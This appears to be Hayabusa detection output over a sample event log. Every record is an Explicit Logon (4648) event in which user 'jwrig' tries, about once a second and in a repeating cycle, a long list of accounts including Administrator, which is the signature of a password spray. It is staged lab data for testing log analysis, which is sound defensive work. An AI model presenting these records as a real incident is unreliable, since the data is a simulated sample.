DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:11.465 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:12.549 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:13.611 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:14.687 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:15.750 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:16.841 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:17.922 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:19.035 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:20.097 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:21.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:22.222 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:23.295 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:24.342 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:25.404 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:26.504 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:27.583 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:28.654 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:29.712 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:30.787 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:31.861 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:32.955 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:34.020 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:35.081 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:36.151 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:37.238 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:38.310 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:39.393 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:40.457 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:41.553 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:42.613 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:43.686 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:44.738 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:45.818 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:46.896 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:47.953 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:49.019 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:50.082 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:51.156 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:52.214 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:53.285 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:54.354 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:55.438 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:56.513 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:57.578 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bhostetler : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:58.661 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: rbowes : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:59.721 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ebooth : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:00.795 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cfleener : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:01.865 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cmoody : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:02.941 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: psmith : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:04.015 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jkulikowski : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:05.097 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: gsalinas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:06.182 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: tbennett : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:07.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: econrad : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:08.315 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:09.399 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jleytevidal : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:10.468 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lpesce : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:11.549 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sanson : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:12.621 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: sarmstrong : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:13.709 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: wstrzelec : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:14.769 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: zmathis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:15.849 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: melliott : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:16.918 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: kperryman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:17.999 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jorchilles : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:19.068 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jlake : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:20.129 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: edygert : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:21.201 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: drook : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:22.250 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dmashburn : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:23.338 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cspizor : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:24.404 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cragoso : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:25.468 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgalbraith : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:26.529 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bking : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:27.607 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mdouglas : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:28.691 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: bgreenwood : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:29.753 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: baker : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:30.838 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: ssims : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:31.910 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: smisenar : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:32.983 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: Administrator : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:34.067 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: jwright : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:35.146 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: dpendolino : IP Address: 172.16.144.128 : Process: : Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:36.239 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: celgee : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:37.334 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: thessman : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:38.403 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: eskoudis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:39.463 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: cdavis : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:40.530 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: mtoussain : IP Address: 172.16.144.128 : Process: : Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:28:41.608 +09:00,DESKTOP-JR78RLP,4648,informational,Explicit Logon,Source User: jwrig : Target User: lschifano : IP Address: 172.16.144.128 : Process: : Target Server: 
